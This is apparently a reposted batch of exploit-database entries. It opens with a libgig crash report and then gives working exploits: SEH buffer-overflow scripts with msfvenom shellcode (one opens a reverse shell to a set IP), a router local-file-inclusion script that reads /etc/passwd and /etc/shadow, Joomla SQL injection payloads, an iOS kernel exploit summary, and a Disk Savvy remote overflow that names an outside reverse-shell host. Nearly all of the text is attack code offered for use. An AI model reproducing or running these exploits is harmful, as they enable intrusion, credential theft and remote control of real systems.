    #6 0x7fb8f7350ec4 (/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)
    #7 0x402e5c in _start (/home/a/Documents/libgig-4.0.0/src/tools/.libs/gigdump+0x402e5c)
SUMMARY: AddressSanitizer: SEGV /home/a/Documents/libgig-4.0.0/src/gig.cpp:4445 gig::Instrument::UpdateRegionKeyTable()
==43045== ABORTING


POC:
libgig_4.0.0_invalid_memory_write.gig
CVE:
CVE-2017-12953


5.
the gig::Region::GetSampleFromWavePool function in gig.cpp in gig.cpp in libgig 4.0.0 can cause a denial of service(invalid memory read and application crash) via a crafted gig file.


./gigdump libgig_4.0.0_invalid_memory_read.gig


----debug info:----
Program received signal SIGSEGV, Segmentation fault.
gig::Region::GetSampleFromWavePool (this=0x609160, this@entry=0x612520, 
    WavePoolTableIndex=0, pProgress=pProgress@entry=0x0) at gig.cpp:3849
3849        unsigned long soughtoffset = file->pWavePoolTable[WavePoolTableIndex];
(gdb) bt
#0  gig::Region::GetSampleFromWavePool (this=0x609160, this@entry=0x612520, 
    WavePoolTableIndex=0, pProgress=pProgress@entry=0x0) at gig.cpp:3849
#1  0x00007ffff7bc07df in gig::Region::Region (this=0x612520, 
    pInstrument=<optimized out>, rgnList=0x6100f0) at gig.cpp:2970
#2  0x00007ffff7bc0b36 in gig::Instrument::Instrument (this=0x60ef80, 
    pFile=<optimized out>, insList=0x60eea0, pProgress=0x7fffffffdd90)
    at gig.cpp:4404
#3  0x00007ffff7bc103e in gig::File::LoadInstruments (this=0x609160, 
    pProgress=0x0) at gig.cpp:5576
#4  0x00007ffff7bbade6 in gig::File::GetFirstInstrument (
    this=this@entry=0x609160) at gig.cpp:5378
#5  0x000000000040533b in PrintInstruments (gig=gig@entry=0x609160)
    at gigdump.cpp:205
#6  0x0000000000401f34 in main (argc=<optimized out>, argv=<optimized out>)
    at gigdump.cpp:79
(gdb) disassemble 
Dump of assembler code for function gig::Region::GetSampleFromWavePool(unsigned int, RIFF::progress_t*):
   0x00007ffff7bbac00 <+0>:cmp    $0xffffffff,%esi
   0x00007ffff7bbac03 <+3>:je     0x7ffff7bbac63 <gig::Region::GetSampleFromWavePool(unsigned int, RIFF::progress_t*)+99>
   0x00007ffff7bbac05 <+5>:push   %r12
   0x00007ffff7bbac07 <+7>:push   %rbp
   0x00007ffff7bbac08 <+8>:push   %rbx
   0x00007ffff7bbac09 <+9>:mov    0x18(%rdi),%rax
   0x00007ffff7bbac0d <+13>:mov    0x18(%rax),%rbx
   0x00007ffff7bbac11 <+17>:mov    0x78(%rbx),%rax
   0x00007ffff7bbac15 <+21>:test   %rax,%rax
   0x00007ffff7bbac18 <+24>:je     0x7ffff7bbac5c <gig::Region::GetSampleFromWavePool(unsigned int, RIFF::progress_t*)+92>
   0x00007ffff7bbac1a <+26>:mov    %esi,%ecx
   0x00007ffff7bbac1c <+28>:mov    %rbx,%rdi
   0x00007ffff7bbac1f <+31>:mov    %rdx,%rsi
=> 0x00007ffff7bbac22 <+34>:mov    (%rax,%rcx,4),%ebp
   0x00007ffff7bbac25 <+37>:mov    0x80(%rbx),%rax
   0x00007ffff7bbac2c <+44>:mov    (%rax,%rcx,4),%r12d
   0x00007ffff7bbac30 <+48>:callq  0x7ffff7b9e400 <_ZN3gig4File14GetFirstSampleEPN4RIFF10progress_tE@plt>
   0x00007ffff7bbac35 <+53>:test   %rax,%rax
---Type <return> to continue, or q <return> to quit---q
Quit
(gdb) i r
rax            0x609f806332288
rbx            0x6091606328672
rcx            0xff0000004278190080
rdx            0x00
rsi            0x00
rdi            0x6091606328672
rbp            0x00x0
rsp            0x7fffffffdc900x7fffffffdc90
r8             0x00
r9             0x22
r10            0x00
r11            0x246582
r12            0x6131906369680
r13            0x6125206366496
r14            0x00
r15            0x00
rip            0x7ffff7bbac220x7ffff7bbac22 <gig::Region::GetSampleFromWavePool(unsigned int, RIFF::progress_t*)+34>
eflags         0x10202[ IF RF ]
cs             0x3351
ss             0x2b43
ds             0x00
es             0x00
---Type <return> to continue, or q <return> to quit---
fs             0x00
gs             0x00
(gdb)


ASAN:SIGSEGV
=================================================================
==44028== ERROR: AddressSanitizer: SEGV on unknown address 0x6009fc00ed70 (pc 0x7fea916446ac sp 0x7ffd026ec040 bp 0x0c08c0003ea3 T0)
AddressSanitizer can not provide additional info.
    #0 0x7fea916446ab in gig::Region::GetSampleFromWavePool(unsigned int, RIFF::progress_t*) /home/a/Documents/libgig-4.0.0/src/gig.cpp:3850
    #1 0x7fea91670247 in gig::Region::Region(gig::Instrument*, RIFF::List*) /home/a/Documents/libgig-4.0.0/src/gig.cpp:2970
    #2 0x7fea91671f4a in gig::Instrument::Instrument(gig::File*, RIFF::List*, RIFF::progress_t*) /home/a/Documents/libgig-4.0.0/src/gig.cpp:4404
    #3 0x7fea91673fdc in gig::File::LoadInstruments(RIFF::progress_t*) /home/a/Documents/libgig-4.0.0/src/gig.cpp:5576
    #4 0x7fea916456a0 in gig::File::GetFirstInstrument() /home/a/Documents/libgig-4.0.0/src/gig.cpp:5378
    #5 0x40fca6 in PrintInstruments(gig::File*) /home/a/Documents/libgig-4.0.0/src/tools/gigdump.cpp:205
    #6 0x4027aa in main /home/a/Documents/libgig-4.0.0/src/tools/gigdump.cpp:79
    #7 0x7fea90c93ec4 (/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)
    #8 0x402e5c in _start (/home/a/Documents/libgig-4.0.0/src/tools/.libs/gigdump+0x402e5c)
SUMMARY: AddressSanitizer: SEGV /home/a/Documents/libgig-4.0.0/src/gig.cpp:3849 gig::Region::GetSampleFromWavePool(unsigned int, RIFF::progress_t*)
==44028== ABORTING


POC:
libgig_4.0.0_invalid_memory_read.gig
CVE:
CVE-2017-12954


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42546.zip
HireHackking 
#!/usr/bin/python
 
###############################################################################
# Exploit Title:        Easy Video to iPod/MP4/PSP/3GP Converter 1.5.20 - 'Enter User Name' Field Buffer Overflow (SEH)
# Date:                 24-08-2017
# Exploit Author:       Anurag Srivastava 
# Website:		www.pyramidcyber.com
# Vulnerable Software:  Easy Video to iPod/MP4/PSP/3GP Converter 
# Vendor Homepage:      http://www.divxtodvd.net/
# Version:              1.5.20
# Software Link:        http://www.divxtodvd.net/easy_ipod_mp4_psp_3gp.exe
# Tested On:            Windows 7 x64 
#
#
# To reproduce the exploit:
#   1. Click Register
#   2. In the "Enter User Name" field, paste the content of pyramid.txt
#
##############################################################################
 

buffer = "\x41" * 1008   
 
nSEH = "\xeb\x10\x90\x90"
 
# 0x10037859 : pop esi # pop ebx # ret 0x04 | ascii {PAGE_EXECUTE_READ} [SkinMagic.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False
SEH = "\x59\x78\x03\x10"
 
badchars = "\x00\x0a\x0d" # and 0x80 to 0xff
 
# msfvenom -p windows/exec CMD=calc.exe -b "\x00\x0a\x0d" -f python
buf =  ""
buf += "\xda\xd7\xd9\x74\x24\xf4\xba\x07\xc8\xf9\x11\x5e\x2b"
buf += "\xc9\xb1\x31\x31\x56\x18\x03\x56\x18\x83\xee\xfb\x2a"
buf += "\x0c\xed\xeb\x29\xef\x0e\xeb\x4d\x79\xeb\xda\x4d\x1d"
buf += "\x7f\x4c\x7e\x55\x2d\x60\xf5\x3b\xc6\xf3\x7b\x94\xe9"
buf += "\xb4\x36\xc2\xc4\x45\x6a\x36\x46\xc5\x71\x6b\xa8\xf4"
buf += "\xb9\x7e\xa9\x31\xa7\x73\xfb\xea\xa3\x26\xec\x9f\xfe"
buf += "\xfa\x87\xd3\xef\x7a\x7b\xa3\x0e\xaa\x2a\xb8\x48\x6c"
buf += "\xcc\x6d\xe1\x25\xd6\x72\xcc\xfc\x6d\x40\xba\xfe\xa7"
buf += "\x99\x43\xac\x89\x16\xb6\xac\xce\x90\x29\xdb\x26\xe3"
buf += "\xd4\xdc\xfc\x9e\x02\x68\xe7\x38\xc0\xca\xc3\xb9\x05"
buf += "\x8c\x80\xb5\xe2\xda\xcf\xd9\xf5\x0f\x64\xe5\x7e\xae"
buf += "\xab\x6c\xc4\x95\x6f\x35\x9e\xb4\x36\x93\x71\xc8\x29"
buf += "\x7c\x2d\x6c\x21\x90\x3a\x1d\x68\xfe\xbd\x93\x16\x4c"
buf += "\xbd\xab\x18\xe0\xd6\x9a\x93\x6f\xa0\x22\x76\xd4\x5e"
buf += "\x69\xdb\x7c\xf7\x34\x89\x3d\x9a\xc6\x67\x01\xa3\x44"
buf += "\x82\xf9\x50\x54\xe7\xfc\x1d\xd2\x1b\x8c\x0e\xb7\x1b"
buf += "\x23\x2e\x92\x7f\xa2\xbc\x7e\xae\x41\x45\xe4\xae"
 
nops = "\x90" * 16
 
badchars = "\x0a\x0d"
 
data = buffer + nSEH + SEH + nops + buf
 
f = open ("pyramid.txt", "w")
f.write(data)
f.close()
HireHackking 
# Exploit Title:  WIFI Repeater BE126 – Local File Inclusion
# Date Publish: 23/08/2017
# Exploit Authors: Hay Mizrachi, Omer Kaspi

# Contact: haymizrachi@gmail.com, komerk0@gmail.com
# Vendor Homepage: http://www.twsz.com
# Category: Webapps
# Version: 1.0
# Tested on: Windows/Ubuntu 16.04

# CVE: CVE-2017-8770

1 - Description:

'getpage' HTTP parameter is not escaped in include file,

Which allow us to include local files with a root privilege user, aka /etc/password,
/etc/shadow and so on.

2 - Proof of Concept:

http://Target/cgi-bin/webproc?getpage=[LFI]

 

/etc/passwd:

http://Target/cgi-bin/webproc?getpage=../../../../etc/passwd&errorpage=html/main.html&var:language=en_us&var:menu=setup&var:login=true&var:page=wizard


#root:x:0:0:root:/root:/bin/bash

root:x:0:0:root:/root:/bin/sh

#tw:x:504:504::/home/tw:/bin/bash

#tw:x:504:504::/home/tw:/bin/msh

 

/etc/shadow;

 

http://Target/cgi-bin/webproc?getpage=../../../../etc/shadow&errorpage=html/main.html&var:language=en_us&var:menu=setup&var:login=true&var:page=wizard

 

import urllib2, httplib, sys
 
'''
	LFI PoC By Hay and Omer
'''
 
print "[+] cgi-bin/webproc exploiter [+]"
print "[+] usage: python " + __file__ + " http://<target_ip>"
 
ip_add = sys.argv[1]
fd = raw_input('[+] File or Directory: aka /etc/passwd and etc..\n')
 
print "Exploiting....."
print '\n'
URL = "http://" + ip_add + "/cgi-bin/webproc?getpage=/" + fd + "&errorpage=html/main.html&var:language=en_us&var:menu=setup&var:login=true&var:page=wizard"
print urllib2.urlopen(URL).read()
HireHackking 
#!/usr/bin/python
 
###############################################################################
# Exploit Title:        Easy AVI DivX Converter 1.2.24 - 'Enter User Name' Field Buffer Overflow (SEH)
# Date:                 24-08-2017
# Exploit Author:       Anurag Srivastava 
# Website:		www.pyramidcyber.com
# Vulnerable Software:  Easy AVI DivX Converter 
# Vendor Homepage:      http://www.divxtodvd.net/
# Version:              1.2.24
# Software Link:        http://www.divxtodvd.net/easy_avi_converter.exe
# Tested On:            Windows 7 x64 
#
#
# To reproduce the exploit:
#   1. Click Register
#   2. In the "Enter User Name" field, paste the content of pyramid.txt
#
##############################################################################
 

buffer = "\x41" * 1008   
 
nSEH = "\xeb\x10\x90\x90"
 
# 0x10037859 : pop esi # pop ebx # ret 0x04 | ascii {PAGE_EXECUTE_READ} [SkinMagic.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False
SEH = "\x59\x78\x03\x10"
 
badchars = "\x00\x0a\x0d" # and 0x80 to 0xff
 
# msfvenom -p windows/exec CMD=calc.exe -b "\x00\x0a\x0d" -f python
buf =  ""
buf += "\xda\xd7\xd9\x74\x24\xf4\xba\x07\xc8\xf9\x11\x5e\x2b"
buf += "\xc9\xb1\x31\x31\x56\x18\x03\x56\x18\x83\xee\xfb\x2a"
buf += "\x0c\xed\xeb\x29\xef\x0e\xeb\x4d\x79\xeb\xda\x4d\x1d"
buf += "\x7f\x4c\x7e\x55\x2d\x60\xf5\x3b\xc6\xf3\x7b\x94\xe9"
buf += "\xb4\x36\xc2\xc4\x45\x6a\x36\x46\xc5\x71\x6b\xa8\xf4"
buf += "\xb9\x7e\xa9\x31\xa7\x73\xfb\xea\xa3\x26\xec\x9f\xfe"
buf += "\xfa\x87\xd3\xef\x7a\x7b\xa3\x0e\xaa\x2a\xb8\x48\x6c"
buf += "\xcc\x6d\xe1\x25\xd6\x72\xcc\xfc\x6d\x40\xba\xfe\xa7"
buf += "\x99\x43\xac\x89\x16\xb6\xac\xce\x90\x29\xdb\x26\xe3"
buf += "\xd4\xdc\xfc\x9e\x02\x68\xe7\x38\xc0\xca\xc3\xb9\x05"
buf += "\x8c\x80\xb5\xe2\xda\xcf\xd9\xf5\x0f\x64\xe5\x7e\xae"
buf += "\xab\x6c\xc4\x95\x6f\x35\x9e\xb4\x36\x93\x71\xc8\x29"
buf += "\x7c\x2d\x6c\x21\x90\x3a\x1d\x68\xfe\xbd\x93\x16\x4c"
buf += "\xbd\xab\x18\xe0\xd6\x9a\x93\x6f\xa0\x22\x76\xd4\x5e"
buf += "\x69\xdb\x7c\xf7\x34\x89\x3d\x9a\xc6\x67\x01\xa3\x44"
buf += "\x82\xf9\x50\x54\xe7\xfc\x1d\xd2\x1b\x8c\x0e\xb7\x1b"
buf += "\x23\x2e\x92\x7f\xa2\xbc\x7e\xae\x41\x45\xe4\xae"
 
nops = "\x90" * 16
 
badchars = "\x0a\x0d"
 
data = buffer + nSEH + SEH + nops + buf
 
f = open ("pyramid.txt", "w")
f.write(data)
f.close()
HireHackking 
#!/usr/bin/python
 
###############################################################################
# Exploit Title:        My Video Converter 1.5.24 - 'Enter User Name' Field Buffer Overflow (SEH)
# Date:                 24-08-2017
# Exploit Author:       Anurag Srivastava 
# Website:		www.pyramidcyber.com
# Vulnerable Software:  My Video Converter 1.5.24 
# Vendor Homepage:      http://www.divxtodvd.net/
# Version:              1.5.24
# Software Link:        http://www.divxtodvd.net/my_video_converter.exe
# Tested On:            Windows 7 x64 
#
#
# To reproduce the exploit:
#   1. Click Register
#   2. In the "Enter User Name" field, paste the content of pyramid.txt
#
##############################################################################
 

buffer = "\x41" * 1008   
 
nSEH = "\xeb\x10\x90\x90"
 
# 0x10037859 : pop esi # pop ebx # ret 0x04 | ascii {PAGE_EXECUTE_READ} [SkinMagic.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False
SEH = "\x59\x78\x03\x10"
 
badchars = "\x00\x0a\x0d" # and 0x80 to 0xff
 
# msfvenom -p windows/exec CMD=calc.exe -b "\x00\x0a\x0d" -f python
buf =  ""
buf += "\xda\xd7\xd9\x74\x24\xf4\xba\x07\xc8\xf9\x11\x5e\x2b"
buf += "\xc9\xb1\x31\x31\x56\x18\x03\x56\x18\x83\xee\xfb\x2a"
buf += "\x0c\xed\xeb\x29\xef\x0e\xeb\x4d\x79\xeb\xda\x4d\x1d"
buf += "\x7f\x4c\x7e\x55\x2d\x60\xf5\x3b\xc6\xf3\x7b\x94\xe9"
buf += "\xb4\x36\xc2\xc4\x45\x6a\x36\x46\xc5\x71\x6b\xa8\xf4"
buf += "\xb9\x7e\xa9\x31\xa7\x73\xfb\xea\xa3\x26\xec\x9f\xfe"
buf += "\xfa\x87\xd3\xef\x7a\x7b\xa3\x0e\xaa\x2a\xb8\x48\x6c"
buf += "\xcc\x6d\xe1\x25\xd6\x72\xcc\xfc\x6d\x40\xba\xfe\xa7"
buf += "\x99\x43\xac\x89\x16\xb6\xac\xce\x90\x29\xdb\x26\xe3"
buf += "\xd4\xdc\xfc\x9e\x02\x68\xe7\x38\xc0\xca\xc3\xb9\x05"
buf += "\x8c\x80\xb5\xe2\xda\xcf\xd9\xf5\x0f\x64\xe5\x7e\xae"
buf += "\xab\x6c\xc4\x95\x6f\x35\x9e\xb4\x36\x93\x71\xc8\x29"
buf += "\x7c\x2d\x6c\x21\x90\x3a\x1d\x68\xfe\xbd\x93\x16\x4c"
buf += "\xbd\xab\x18\xe0\xd6\x9a\x93\x6f\xa0\x22\x76\xd4\x5e"
buf += "\x69\xdb\x7c\xf7\x34\x89\x3d\x9a\xc6\x67\x01\xa3\x44"
buf += "\x82\xf9\x50\x54\xe7\xfc\x1d\xd2\x1b\x8c\x0e\xb7\x1b"
buf += "\x23\x2e\x92\x7f\xa2\xbc\x7e\xae\x41\x45\xe4\xae"
 
nops = "\x90" * 16
 
badchars = "\x0a\x0d"
 
data = buffer + nSEH + SEH + nops + buf
 
f = open ("pyramid.txt", "w")
f.write(data)
f.close()
HireHackking 
#!/usr/bin/python
 
###############################################################################
# Exploit Title:        MP3 WAV to CD Burner 1.4.24 - 'Enter User Name' Field Buffer Overflow (SEH)
# Date:                 24-08-2017
# Exploit Author:       Anurag Srivastava 
# Website:		www.pyramidcyber.com
# Vulnerable Software:  MP3 WAV to CD Burner 
# Vendor Homepage:      http://www.divxtodvd.net/
# Version:              1.4.24
# Software Link:        http://www.divxtodvd.net/mp3_cd_burner.exe
# Tested On:            Windows 7 x64 
#   All the vendor's softwares below are affected to this bug which all can be found in http://www.divxtodvd.net/ till date 24-08-2017 .
#   Easy MPEG/AVI/DIVX/WMV/RM to DVD
#   Easy Avi/Divx/Xvid to DVD Burner
#   Easy MPEG to DVD Burner
#   Easy WMV/ASF/ASX to DVD Burner
#   Easy RM RMVB to DVD Burner
#   Easy CD DVD Copy
#   MP3/AVI/MPEG/WMV/RM to Audio CD Burner
#   MP3/WAV/OGG/WMA/AC3 to CD Burner
#   Easy MOV Converter
#   Easy Video to iPod Converter
#   Easy Video to PSP Converter
#   Easy Video to 3GP Converter
#   Easy Video to MP4 Converter
#
#
# To reproduce the exploit:
#   1. Click Register
#   2. In the "Enter User Name" field, paste the content of pyramid.txt
#
##############################################################################
 

buffer = "\x41" * 1008   
 
nSEH = "\xeb\x10\x90\x90"
 
# 0x10037859 : pop esi # pop ebx # ret 0x04 | ascii {PAGE_EXECUTE_READ} [SkinMagic.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False
SEH = "\x59\x78\x03\x10"
 
badchars = "\x00\x0a\x0d" # and 0x80 to 0xff
 
# msfvenom -p windows/exec CMD=calc.exe -b "\x00\x0a\x0d" -f python
buf =  ""
buf += "\xda\xd7\xd9\x74\x24\xf4\xba\x07\xc8\xf9\x11\x5e\x2b"
buf += "\xc9\xb1\x31\x31\x56\x18\x03\x56\x18\x83\xee\xfb\x2a"
buf += "\x0c\xed\xeb\x29\xef\x0e\xeb\x4d\x79\xeb\xda\x4d\x1d"
buf += "\x7f\x4c\x7e\x55\x2d\x60\xf5\x3b\xc6\xf3\x7b\x94\xe9"
buf += "\xb4\x36\xc2\xc4\x45\x6a\x36\x46\xc5\x71\x6b\xa8\xf4"
buf += "\xb9\x7e\xa9\x31\xa7\x73\xfb\xea\xa3\x26\xec\x9f\xfe"
buf += "\xfa\x87\xd3\xef\x7a\x7b\xa3\x0e\xaa\x2a\xb8\x48\x6c"
buf += "\xcc\x6d\xe1\x25\xd6\x72\xcc\xfc\x6d\x40\xba\xfe\xa7"
buf += "\x99\x43\xac\x89\x16\xb6\xac\xce\x90\x29\xdb\x26\xe3"
buf += "\xd4\xdc\xfc\x9e\x02\x68\xe7\x38\xc0\xca\xc3\xb9\x05"
buf += "\x8c\x80\xb5\xe2\xda\xcf\xd9\xf5\x0f\x64\xe5\x7e\xae"
buf += "\xab\x6c\xc4\x95\x6f\x35\x9e\xb4\x36\x93\x71\xc8\x29"
buf += "\x7c\x2d\x6c\x21\x90\x3a\x1d\x68\xfe\xbd\x93\x16\x4c"
buf += "\xbd\xab\x18\xe0\xd6\x9a\x93\x6f\xa0\x22\x76\xd4\x5e"
buf += "\x69\xdb\x7c\xf7\x34\x89\x3d\x9a\xc6\x67\x01\xa3\x44"
buf += "\x82\xf9\x50\x54\xe7\xfc\x1d\xd2\x1b\x8c\x0e\xb7\x1b"
buf += "\x23\x2e\x92\x7f\xa2\xbc\x7e\xae\x41\x45\xe4\xae"
 
nops = "\x90" * 16
 
badchars = "\x0a\x0d"
 
data = buffer + nSEH + SEH + nops + buf
 
f = open ("pyramid.txt", "w")
f.write(data)
f.close()
HireHackking 
# # # # # 
# Exploit Title: Joomla! Component Price Alert 3.0.2 - SQL Injection
# Dork: N/A
# Date: 25.08.2017
# Vendor Homepage: https://www.weborange.eu/
# Software Link: https://extensions.joomla.org/extensions/extension/extension-specific/virtuemart-extensions/price-alert/
# Demo: https://www.weborange.eu/extensions/index.php/extensions-vm3/price-alert-detail
# Version: 3.0.2
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
# 	
# Proof of Concept:
# 
# http://localhost/[PATH]/index.php?option=com_price_alert&view=subscribeajax&task=pricealert_ajax&product_id=[SQL]
#
# 64+aND(/*!11100sELeCT*/+0x30783331+/*!11100FrOM*/+(/*!11100SeLeCT*/+cOUNT(*),/*!11100CoNCaT*/((sELEcT(sELECT+/*!11100CoNCAt*/(cAST(dATABASE()+aS+cHAR),0x7e,0x496873616E53656e63616e))+fROM+iNFORMATION_sCHEMA.tABLES+wHERE+tABLE_sCHEMA=dATABASE()+lIMIT+0,1),fLOOR(rAND(0)*2))x+fROM+iNFORMATION_sCHEMA.tABLES+gROUP+bY+x)a)+AND+1=1
#
# Etc..
# # # # #
HireHackking 
# # # # # 
# Exploit Title: Joomla! Component Bargain Product VM3 1.0 - SQL Injection
# Dork: N/A
# Date: 25.08.2017
# Vendor Homepage: https://www.weborange.eu/
# Software Link: https://www.weborange.eu/extensions/index.php/extensions-vm3/bargain-product-vm3-detail
# Demo: http://www.weborange.eu/demo/index.php/bargain-product
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
# 	
# Proof of Concept:
# 
# http://localhost/[PATH]/index.php/component/pazzari_vm3/?view=brainy&product_id=[SQL]
# http://localhost/[PATH]/index.php/component/pazzari_vm3/?view=alice&product_id=[SQL]
#
# 17+OR+0x3231323232+/*!00005Group*/+BY+/*!00005ConcAT_WS*/(0x3a,0x496873616e2053656e63616e,VersioN(),FLooR(RaND(0)*0x32))+/*!00005havinG*/+min(0)+OR+0x31
#
# Etc..
# # # # #
HireHackking

Apple iOS < 10.3.1 - Kernel 

Sources:
https://github.com/doadam/ziVA
https://blog.zimperium.com/ziva-video-audio-ios-kernel-exploit/

ziVA

An iOS kernel exploit designated to work on all 64-bit iOS devices <= 10.3.1

More general information

https://blog.zimperium.com/zimperium-zlabs-ios-security-advisories/

https://blog.zimperium.com/ziva-video-audio-ios-kernel-exploit/

Offsets modifications for other iOS devices

Like a lot (if not most) of the iOS kernel exploits, this also requires offsets for each iOS device and version. Those will be posted in the close future (when I get more time) but should be acquired from AppleAVEDriver (you can get a hint on the offsets from the comments above them).

Sandbox escape

Like mentioned, AppleAVEDriver direct access requires sandbox escape (either mediaserverd sandbox context or no sandbox at all). Fortunately, Sandbox escape exploits have been released by P0, which means this can be used to completely compromise a kernel, and a step towards a full jailbreak.

Is it a Jailbreak?

This is a crucial part in a Jailbreak chain, but this never aimed to become a Jailbreak.

Is this going to be a jailbreak?

Maybe, if someone wants to work on that

Credits

Credit for finding the vulnerabilities, chaining them together, writing the exploit go to Adam Donenfeld (@doadam). Special thanks to Zuk Avraham (@ihackbanme), Yaniv Karta (@shokoluv) and the rest of the Zimperium team for the opportunity (and the paycheck).


Proof of Concept:
https://github.com/doadam/ziVA
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42555.zip
HireHackking 
# # # # # 
# Exploit Title: Joomla! Component Sponsor Wall 8.0 - SQL Injection
# Dork: N/A
# Date: 21.08.2017
# Vendor Homepage: http://pulseextensions.com/
# Software Link: https://extensions.joomla.org/extensions/extension/ads-a-affiliates/sponsors/sponsor-wall/
# Demo: http://demo.pulseextensions.com/sponsor-wall-component-demo/
# Version: 8.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
# 	
# Proof of Concept:
# 
# http://localhost/[PATH]/index.php?option=com_sponsorwall&task=click&wallid=[SQL]
#
# 86+aND(/*!11100sELeCT*/+0x30783331+/*!11100FrOM*/+(/*!11100SeLeCT*/+cOUNT(*),/*!11100CoNCaT*/((sELEcT(sELECT+/*!11100CoNCAt*/(cAST(dATABASE()+aS+cHAR),0x7e,0x496873616E53656e63616e))+fROM+iNFORMATION_sCHEMA.tABLES+wHERE+tABLE_sCHEMA=dATABASE()+lIMIT+0,1),fLOOR(rAND(0)*2))x+fROM+iNFORMATION_sCHEMA.tABLES+gROUP+bY+x)a)+AND+1=1
#
# Etc..
# # # # #
HireHackking 
#!/usr/bin/python

###############################################################################
# Exploit Title:        Easy DVD Creator 2.5.11 - Buffer Overflow (Windows 10 64bit, SEH)
# Date:                 26-08-2017
# Exploit Author:       tr0ubl3m4k3r
# Vulnerable Software:  Easy DVD Creator
# Vendor Homepage:      http://www.divxtodvd.net/
# Version:              2.5.11
# Software Link:        http://www.divxtodvd.net/easy_dvd_creator.exe
# Tested On:            Windows 10 64bit
#
# Credit to Muhann4d for discovering the PoC (41911).
#
# To reproduce the exploit:
#	1. Click Register
#	2. In the "Enter User Name" field, paste the content of exploit.txt
#
##############################################################################


buffer = "\x41" * 988
nSEH = "\xeb\x09\x90\x90"

# 0x10037859 : pop ebx # pop eax # ret  | ascii {PAGE_EXECUTE_READ} [SkinMagic.dll] 
# ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.8.1.1 (C:\Program Files (x86)\Easy MOV Converter\SkinMagic.dll)

SEH = "\x59\x78\x03\x10"
junk = "\x90"*16

# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.2.105 LPORT=443
# -f c -e x86/shikata_ga_nai -b "\x00\x0a\x0d"

shellcode = ("\xdb\xd5\xbf\xd7\xf8\x35\x95\xd9\x74\x24\xf4\x5a\x2b\xc9\xb1"
"\x52\x83\xc2\x04\x31\x7a\x13\x03\xad\xeb\xd7\x60\xad\xe4\x9a"
"\x8b\x4d\xf5\xfa\x02\xa8\xc4\x3a\x70\xb9\x77\x8b\xf2\xef\x7b"
"\x60\x56\x1b\x0f\x04\x7f\x2c\xb8\xa3\x59\x03\x39\x9f\x9a\x02"
"\xb9\xe2\xce\xe4\x80\x2c\x03\xe5\xc5\x51\xee\xb7\x9e\x1e\x5d"
"\x27\xaa\x6b\x5e\xcc\xe0\x7a\xe6\x31\xb0\x7d\xc7\xe4\xca\x27"
"\xc7\x07\x1e\x5c\x4e\x1f\x43\x59\x18\x94\xb7\x15\x9b\x7c\x86"
"\xd6\x30\x41\x26\x25\x48\x86\x81\xd6\x3f\xfe\xf1\x6b\x38\xc5"
"\x88\xb7\xcd\xdd\x2b\x33\x75\x39\xcd\x90\xe0\xca\xc1\x5d\x66"
"\x94\xc5\x60\xab\xaf\xf2\xe9\x4a\x7f\x73\xa9\x68\x5b\xdf\x69"
"\x10\xfa\x85\xdc\x2d\x1c\x66\x80\x8b\x57\x8b\xd5\xa1\x3a\xc4"
"\x1a\x88\xc4\x14\x35\x9b\xb7\x26\x9a\x37\x5f\x0b\x53\x9e\x98"
"\x6c\x4e\x66\x36\x93\x71\x97\x1f\x50\x25\xc7\x37\x71\x46\x8c"
"\xc7\x7e\x93\x03\x97\xd0\x4c\xe4\x47\x91\x3c\x8c\x8d\x1e\x62"
"\xac\xae\xf4\x0b\x47\x55\x9f\xf3\x30\x57\x36\x9c\x42\x57\xc9"
"\xe7\xca\xb1\xa3\x07\x9b\x6a\x5c\xb1\x86\xe0\xfd\x3e\x1d\x8d"
"\x3e\xb4\x92\x72\xf0\x3d\xde\x60\x65\xce\x95\xda\x20\xd1\x03"
"\x72\xae\x40\xc8\x82\xb9\x78\x47\xd5\xee\x4f\x9e\xb3\x02\xe9"
"\x08\xa1\xde\x6f\x72\x61\x05\x4c\x7d\x68\xc8\xe8\x59\x7a\x14"
"\xf0\xe5\x2e\xc8\xa7\xb3\x98\xae\x11\x72\x72\x79\xcd\xdc\x12"
"\xfc\x3d\xdf\x64\x01\x68\xa9\x88\xb0\xc5\xec\xb7\x7d\x82\xf8"
"\xc0\x63\x32\x06\x1b\x20\x42\x4d\x01\x01\xcb\x08\xd0\x13\x96"
"\xaa\x0f\x57\xaf\x28\xa5\x28\x54\x30\xcc\x2d\x10\xf6\x3d\x5c"
"\x09\x93\x41\xf3\x2a\xb6")
padding = "\x44"*(1000-351)
f = open ("exploit.txt", "w")
f.write(buffer + nSEH + SEH + junk + shellcode + padding)
f.close()
HireHackking 
#!/usr/bin/env python
# Exploit Title: Disk Savvy Enterprise 9.9.14 Remote SEH Buffer Overflow
# Date: 2017-08-25
# Exploit Author: Nipun Jaswal & Anurag Srivastava
# Author Homepage: www.pyramidcyber.com
# Vendor Homepage: http://www.disksavvy.com
# Software Link: http://www.disksavvy.com/setups/disksavvyent_setup_v9.9.14.exe
# Version: v9.9.14
# Tested on: Windows 7 SP1 x64
# Steps to Reproduce : Go to Options --> Server --> Check Enable Web Server on Port, Enter Any Port[8080] --> Save 
import socket,sys
target = "127.0.0.1"
port = 8080

#msfvenom -p windows/shell_reverse_tcp LHOST=185.92.223.120 LPORT=4443 EXITFUN=none -e x86/alpha_mixed -f python
buf =  ""
